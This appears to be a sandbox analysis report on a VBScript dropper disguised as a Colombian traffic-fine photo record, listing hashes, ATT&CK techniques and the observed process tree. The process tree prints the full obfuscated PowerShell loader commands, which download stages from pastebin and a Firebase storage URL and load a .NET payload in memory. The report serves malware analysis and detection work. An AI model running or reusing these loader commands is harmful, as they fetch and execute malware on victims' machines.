a3bc7c27473789a4dda4379a748286413ca2c99933dc71abdaf7f9c67649d854

General

Target

ACTA DE FOTO COMPARENDOS IMAGENES DETALLADAS RADICADO No 2024-99663326-9966566-9996589-JPG.vbs
Size

207KB
MD5

435df20a9b01d9e40b5c8bfcc0d854f3
SHA1

ae3f4580799db52473bd2dc41db7903819f3d8e1
SHA256

3a27d687ad30981166c9b94a4bb30eaf4cb57ceaa6276531c544c0073047a0ff
SHA512

613f815e2bcc7dbcc0c1dc591c9ba551678ec32d8bdeae58be17d5ac8cbc663760c65a171696df5ac26a74e4307ea87b10c006397d905e5ef69a8a8d2d75e907
SSDEEP

192:7///////////////////////////////////////////////////////////////:WHFzLPTnRStYhSXIBoFN

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/0FK5ax2D

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2708	powershell.exe
2832	powershell.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2604	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2604	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2708	powershell.exe
2832	powershell.exe
2580	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2644 wrote to memory of 2708	2644	WScript.exe	30
PID 2644 wrote to memory of 2708	2644	WScript.exe	30
PID 2644 wrote to memory of 2708	2644	WScript.exe	30
PID 2708 wrote to memory of 2832	2708	powershell.exe	32
PID 2708 wrote to memory of 2832	2708	powershell.exe	32
PID 2708 wrote to memory of 2832	2708	powershell.exe	32
PID 2832 wrote to memory of 1648	2832	powershell.exe	33
PID 2832 wrote to memory of 1648	2832	powershell.exe	33
PID 2832 wrote to memory of 1648	2832	powershell.exe	33
PID 2832 wrote to memory of 2604	2832	powershell.exe	34
PID 2832 wrote to memory of 2604	2832	powershell.exe	34
PID 2832 wrote to memory of 2604	2832	powershell.exe	34
PID 2832 wrote to memory of 2580	2832	powershell.exe	35
PID 2832 wrote to memory of 2580	2832	powershell.exe	35
PID 2832 wrote to memory of 2580	2832	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ACTA DE FOTO COMPARENDOS IMAGENES DETALLADAS RADICADO No 2024-99663326-9966566-9996589-JPG.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★EM★QwBS★Gg★bQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★M★BG★Es★NQBh★Hg★MgBE★Cc★I★★7★CQ★Zg★g★D0★I★★o★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★I★★7★Ek★bgB2★G8★awBl★C0★VwBl★GI★UgBl★HE★dQBl★HM★d★★g★C0★VQBS★Ek★I★★k★EM★QwBS★Gg★bQ★g★C0★TwB1★HQ★RgBp★Gw★ZQ★g★CQ★Zg★g★C0★VQBz★GU★QgBh★HM★aQBj★F★★YQBy★HM★aQBu★Gc★I★★7★GM★bQBk★C4★ZQB4★GU★I★★v★GM★I★★7★H★★aQBu★Gc★I★★x★DI★Nw★u★D★★Lg★w★C4★MQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★u★GU★e★Bl★C★★LQBj★G8★bQBt★GE★bgBk★C★★ew★k★GY★I★★9★C★★K★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★SQBu★HY★bwBr★GU★LQBX★GU★YgBS★GU★cQB1★GU★cwB0★C★★LQBV★FI★SQ★g★CQ★UQBQ★HQ★YQB2★C★★LQBP★HU★d★BG★Gk★b★Bl★C★★J★Bm★C★★LQBV★HM★ZQBC★GE★cwBp★GM★U★Bh★HI★cwBp★G4★ZwB9★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★J★B3★GQ★YQB5★HY★I★★9★C★★Jw★w★Cc★I★★7★CQ★Z★B2★Gg★b★B4★C★★PQ★g★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★C★★OwBb★EI★eQB0★GU★WwBd★F0★I★★k★Hk★d★Bx★GQ★c★★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★FE★U★B0★GE★dg★u★HI★ZQBw★Gw★YQBj★GU★K★★n★CQ★J★★n★Cw★JwBB★Cc★KQ★g★Ck★I★★7★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★OgBD★HU★cgBy★GU★bgB0★EQ★bwBt★GE★aQBu★C4★T★Bv★GE★Z★★o★CQ★eQB0★HE★Z★Bw★Ck★LgBH★GU★d★BU★Hk★c★Bl★Cg★JwBU★GU★a★B1★Gw★YwBo★GU★cwBY★Hg★W★B4★Hg★LgBD★Gw★YQBz★HM★MQ★n★Ck★LgBH★GU★d★BN★GU★d★Bo★G8★Z★★o★Cc★TQBz★HE★QgBJ★GI★WQ★n★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★CQ★bgB1★Gw★b★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★JwBj★GQ★O★Bk★GM★OQ★z★Dk★Yg★w★Dc★Zg★t★GU★M★★x★Dk★LQ★w★DU★Mw★0★C0★YQ★w★Dc★MQ★t★Dc★N★★w★GU★O★Bl★GM★Nw★9★G4★ZQBr★G8★d★★m★GE★aQBk★GU★bQ★9★HQ★b★Bh★D8★d★B4★HQ★Lg★4★DE★O★★x★Dg★O★★4★DE★O★★x★EY★Mg★l★FM★QQBU★Ew★VQBN★D★★Mg★l★FM★RQBU★FI★TwBQ★FM★TgBB★FI★V★BT★E4★SQBN★D★★Mg★l★FQ★SQBN★Ek★Uw★v★G8★LwBt★G8★Yw★u★HQ★bwBw★HM★c★Bw★GE★LgBh★Dg★MQ★z★DE★LQBh★GE★cwBv★G8★bwBy★HI★cgBy★C8★Yg★v★D★★dg★v★G0★bwBj★C4★cwBp★H★★YQBl★Gw★ZwBv★G8★Zw★u★GU★ZwBh★HI★bwB0★HM★ZQBz★GE★YgBl★HI★aQBm★C8★Lw★6★HM★c★B0★HQ★a★★n★C★★L★★g★CQ★Z★B2★Gg★b★B4★C★★L★★g★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★s★C★★J★B3★GQ★YQB5★HY★L★★g★Cc★MQ★n★Cw★I★★n★FI★bwBk★GE★Jw★g★Ck★KQ★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\ACTA DE FOTO COMPARENDOS IMAGENES DETALLADAS RADICADO No 2024-99663326-9966566-9996589-JPG.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/0FK5ax2D' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$wdayv = '0' ;$dvhlx = 'C:\Users\Admin\AppData\Local\Temp\ACTA DE FOTO COMPARENDOS IMAGENES DETALLADAS RADICADO No 2024-99663326-9966566-9996589-JPG.vbs' ;[Byte[]] $ytqdp = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($ytqdp).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('cd8dc939b07f-e019-0534-a071-740e8ec7=nekot&aidem=tla?txt.8181888181F2%SATLUM02%SETROPSNARTSNIM02%TIMIS/o/moc.topsppa.a8131-aasooorrrr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $dvhlx , '____________________________________________-------', $wdayv, '1', 'Roda' ));"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:1648
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6a2cfb4e7d5aa44440549357267e7a46

SHA1
723a3549f223fcdded583218c41e5000022f37b5

SHA256
d6aa35881386f875add2dd2f8b61df2796bb253f28286297cdabcb029444a4f2

SHA512
65ded3e4eb839a7aae462f374536a8eb0a65c9e00c852ba454ad8aad9e5f2c03fbdd94549c8b3ef737c7af03fc0538c13f25f42799eba93c9b29329d1052c215

Download Submit
memory/2708-4-0x000007FEF609E000-0x000007FEF609F000-memory.dmp

Filesize
4KB

Download
memory/2708-6-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

Filesize
9.6MB

Download
memory/2708-7-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2708-5-0x000000001B800000-0x000000001BAE2000-memory.dmp

Filesize
2.9MB

Download
memory/2708-8-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

Filesize
9.6MB

Download
memory/2708-9-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

Filesize
9.6MB

Download
memory/2708-10-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

Filesize
9.6MB

Download
memory/2708-11-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

Filesize
9.6MB

Download
memory/2708-22-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing